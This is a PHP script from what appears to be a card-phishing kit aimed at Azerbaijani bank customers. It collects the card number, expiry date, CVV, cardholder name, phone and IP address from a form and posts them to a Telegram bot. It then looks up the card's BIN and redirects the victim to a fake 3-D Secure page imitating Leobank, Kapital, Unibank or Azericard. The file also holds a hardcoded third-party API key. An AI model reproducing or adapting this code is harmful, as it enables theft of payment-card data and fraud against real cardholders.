<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    require_once 'ip_tracker.php';
    
    $userIp = $_SERVER['REMOTE_ADDR'];
    if (!checkIPLimit($userIp)) {
        die("Too many attempts from your IP address. Please try again later.");
    }

    $amount = isset($_POST['amount']) ? floatval($_POST['amount']) : 0;
    $name = isset($_POST['name']) ? $_POST['name'] : '';
    $phone = isset($_POST['phone']) ? $_POST['phone'] : '';
    $card = isset($_POST['card']) ? $_POST['card'] : '';
    $expdate = isset($_POST['expdate']) ? $_POST['expdate'] : '';
    $cvv = isset($_POST['cvv']) ? $_POST['cvv'] : '';

    if ($amount <= 0) {
        die("Invalid amount");
    }
function loadEnv($path) {
    if (!file_exists($path)) return;

    foreach (file($path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) as $line) {
        if (str_starts_with(trim($line), '#')) continue;
        list($key, $value) = explode('=', $line, 2);
        $_ENV[trim($key)] = trim($value);
        putenv("$key=$value");
    }
}

loadEnv(__DIR__ . '/.env');



    
    function send_message($message) {
        $botToken = $_ENV['BOT_TOKEN'];
$chatId = $_ENV['CHAT_ID'];

        $telegramUrl = "https://api.telegram.org/bot$botToken/sendMessage";
        $telegramData = [
            'chat_id' => $chatId,
            'text' => $message,
            'parse_mode' => 'HTML'
        ];

        $telegramOptions = [
            'http' => [
                'header' => "Content-Type: application/json\r\n",
                'method' => 'POST',
                'content' => json_encode($telegramData)
            ]
        ];

        $telegramContext = stream_context_create($telegramOptions);
        file_get_contents($telegramUrl, false, $telegramContext);
    }

    $idFile = 'message_id.txt';
    if (!file_exists($idFile)) {
        file_put_contents($idFile, '1');
    }
    $currentId = (int)file_get_contents($idFile);
    $nextId = $currentId + 1;
    file_put_contents($idFile, $nextId);

    $userIp = $_SERVER['REMOTE_ADDR'];

    $cardNumber = preg_replace('/\D/', '', $card);
    $cardName = htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
    $phoneNumber = htmlspecialchars($phone, ENT_QUOTES, 'UTF-8');
    $expdate = htmlspecialchars($expdate, ENT_QUOTES, 'UTF-8');
    $cvv = preg_replace('/\D/', '', $cvv);

    $cleanPhoneNumber = preg_replace('/[^\d+]/', '', $phoneNumber);

    $message = "💳 <b>Kart Məlumatları</b>\n"
             . "🆔 Mesaj ID: <code>$currentId</code>\n"
             . "💰 Məbləğ: <code>$amount</code>\n"
             . "👤 Kart sahibi: <code>$cardName</code>\n"
             . "📱 Mobil nömrə: <code>$cleanPhoneNumber</code>\n"
             . "🔢 16 rəqəmli kod: <code>$cardNumber</code>\n"
             . "📅 Son istifadə tarixi: <code>$expdate</code>\n"
             . "🔒 CVV: <code>$cvv</code>\n"
             . "🌐 IP Adresi: <code>$userIp</code>\n\n"
             . "<a href='https://wa.me/$cleanPhoneNumber'>WhatsApp'dan yaz</a>";

    send_message($message);

    $bin = substr($cardNumber, 0, 6);


    $specialBins = ["541124", "409858", "440553"];
    if (in_array($bin, $specialBins)) {
        header("Location: leobank-3ds.html?amount=" . urlencode($amount) . "&card=" . urlencode($cardNumber));
        exit;
    }

    $curl = curl_init();

    curl_setopt_array($curl, [
        CURLOPT_URL => "https://bin-ip-checker.p.rapidapi.com/?bin=".$bin,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_ENCODING => "",
        CURLOPT_MAXREDIRS => 10,
        CURLOPT_TIMEOUT => 30,
        CURLOPT_HTTP_VERSION => CURL_HTTP_VERSION_1_1,
        CURLOPT_CUSTOMREQUEST => "POST",
        CURLOPT_POSTFIELDS => json_encode([
            'bin' => $bin
        ]),
        CURLOPT_HTTPHEADER => [
            "Content-Type: application/json",
            "x-rapidapi-host: bin-ip-checker.p.rapidapi.com",
            "x-rapidapi-key: b7d7690a58mshbbe31af1ee4e93cp14523bjsn120829f26299"
        ],
    ]);

    $response = curl_exec($curl);
    $err = curl_error($curl);
    curl_close($curl);

    if ($err) {
        echo "cURL Hatası: " . $err;
        exit;
    } else {
        $data = json_decode($response, true);
        if ($data && isset($data['BIN']['issuer']['name'])) {
            $bankName = strtoupper($data['BIN']['issuer']['name']);
            if (strpos($bankName, "KAPITAL") !== false) {
                header("Location: kapital-3ds.html?amount=" . urlencode($amount) . "&card=" . urlencode($cardNumber));
                exit;
            }
            else if (strpos($bankName, "UNIBANK") !== false) {
                header("Location: unibank-3ds.html?amount=" . urlencode($amount) . "&card=" . urlencode($cardNumber));
                exit;
            }
        }
    }

    header("Location: azericard-3ds.html?amount=" . urlencode($amount) . "&card=" . urlencode($cardNumber));
    exit;
} else {
    header('Location: ../index.html');
    exit;
}
?>
